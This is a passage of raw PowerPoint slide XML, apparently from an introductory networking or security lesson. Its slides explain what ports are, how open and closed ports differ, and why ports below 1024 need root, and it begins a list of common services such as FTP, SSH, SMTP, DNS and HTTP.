            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The building. One address, one machine on the network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263640" y="1508760"/>
            <a:ext cx="5376672" cy="1965960"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3256"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1737360"/>
            <a:ext cx="4846320" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>:22   :80   :445</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="2286000"/>
            <a:ext cx="4846320" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The doors. 65535 of them per address, each one a different service waiting for you.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3749040"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT THIS MEANS IN PRACTICE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4114800"/>
            <a:ext cx="11064240" cy="1737360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A closed port is not a service. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Nothing is listening, the kernel answers for it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>An open port is a program. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Somebody wrote it, somebody configured it, somebody forgot to update it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ports 0-1023 need root to bind. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>That is why a service on 8080 usually runs as a low privileged user, and one on 80 often does not.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5623560"/>
            <a:ext cx="7315200" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>THE ONES THAT COME UP EVERY SINGLE TIME</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>21</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664208" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664208" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664208" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2779776" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2779776" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2779776" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SMTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3895344" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3895344" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>53</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3895344" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010912" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010912" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010912" y="6236208"/>
            <a:ext cx="1024128" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="5943600"/>
            <a:ext cx="1024128" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9677"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="5998464"/>
            <a:ext cx="1024128" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
